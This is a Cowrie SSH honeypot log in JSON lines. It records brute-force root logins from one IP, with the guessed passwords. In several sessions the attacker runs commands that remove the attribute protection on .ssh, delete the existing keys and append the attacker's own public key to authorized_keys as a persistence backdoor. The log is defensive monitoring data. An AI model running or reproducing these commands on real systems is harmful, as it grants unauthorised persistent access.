{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:43:56.968204Z","src_ip":"212.227.235.229","session":"f0b80aa8999d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:43:57.096481Z","src_ip":"212.227.235.229","session":"f0b80aa8999d"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T15:43:57.702054Z","src_ip":"212.227.235.229","session":"f0b80aa8999d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:43:58.877311Z","src_ip":"212.227.235.229","session":"f0b80aa8999d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55270,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0c4c77e2aa3","protocol":"ssh","message":"New connection: 212.227.235.229:55270 (1.2.3.4:22) [session: a0c4c77e2aa3]","sensor":"my-vps","timestamp":"2025-08-28T15:44:09.077780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:44:09.078676Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:44:09.383885Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38316,"dst_ip":"1.2.3.4","dst_port":22,"session":"a429dbae1923","protocol":"ssh","message":"New connection: 212.227.235.229:38316 (1.2.3.4:22) [session: a429dbae1923]","sensor":"my-vps","timestamp":"2025-08-28T15:44:10.638795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:44:10.639697Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa456789","message":"login attempt [root/Aa456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:44:10.647777Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:44:10.862116Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:44:11.280030Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:44:11.280864Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:44:11.281883Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:11.590733Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd2025","message":"login attempt [root/Passw0rd2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:44:11.792530Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:44:12.651856Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:44:12.652614Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:44:12.653411Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:44:12.673402Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:44:12.674052Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:12.877169Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:44:12.982307Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:12.983367Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54514,"dst_ip":"1.2.3.4","dst_port":22,"session":"5204c7e989cb","protocol":"ssh","message":"New connection: 212.227.235.229:54514 (1.2.3.4:22) [session: 5204c7e989cb]","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.297917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.298958Z","src_ip":"212.227.235.229","session":"5204c7e989cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:44:13.344973Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.345666Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.570118Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.571031Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.615460Z","src_ip":"212.227.235.229","session":"5204c7e989cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38322,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5eff61e1d2c","protocol":"ssh","message":"New connection: 212.227.235.229:38322 (1.2.3.4:22) [session: d5eff61e1d2c]","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.767376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.768387Z","src_ip":"212.227.235.229","session":"d5eff61e1d2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:44:13.974348Z","src_ip":"212.227.235.229","session":"d5eff61e1d2c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:44:14.838322Z","src_ip":"212.227.235.229","session":"d5eff61e1d2c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:44:14.935526Z","src_ip":"212.227.235.229","session":"5204c7e989cb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:16.046733Z","src_ip":"212.227.235.229","session":"d5eff61e1d2c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:16.253649Z","src_ip":"212.227.235.229","session":"5204c7e989cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37448,"dst_ip":"1.2.3.4","dst_port":22,"session":"26b18d14e3dd","protocol":"ssh","message":"New connection: 212.227.235.229:37448 (1.2.3.4:22) [session: 26b18d14e3dd]","sensor":"my-vps","timestamp":"2025-08-28T15:44:16.270568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:44:16.271531Z","src_ip":"212.227.235.229","session":"26b18d14e3dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:44:16.487951Z","src_ip":"212.227.235.229","session":"26b18d14e3dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54526,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5b3830bc4c5","protocol":"ssh","message":"New connection: 212.227.235.229:54526 (1.2.3.4:22) [session: c5b3830bc4c5]","sensor":"my-vps","timestamp":"2025-08-28T15:44:16.566864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:44:16.567830Z","src_ip":"212.227.235.229","session":"c5b3830bc4c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:44:16.885746Z","src_ip":"212.227.235.229","session":"c5b3830bc4c5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:44:17.395467Z","src_ip":"212.227.235.229","session":"26b18d14e3dd"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:17.613797Z","src_ip":"212.227.235.229","session":"a429dbae1923"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:17.614698Z","src_ip":"212.227.235.229","session":"26b18d14e3dd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:44:18.182254Z","src_ip":"212.227.235.229","session":"c5b3830bc4c5"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:18.497540Z","src_ip":"212.227.235.229","session":"a0c4c77e2aa3"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:44:18.499104Z","src_ip":"212.227.235.229","session":"c5b3830bc4c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49590,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac087755f653","protocol":"ssh","message":"New connection: 212.227.235.229:49590 (1.2.3.4:22) [session: ac087755f653]","sensor":"my-vps","timestamp":"2025-08-28T15:44:54.980428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:44:54.981302Z","src_ip":"212.227.235.229","session":"ac087755f653"}
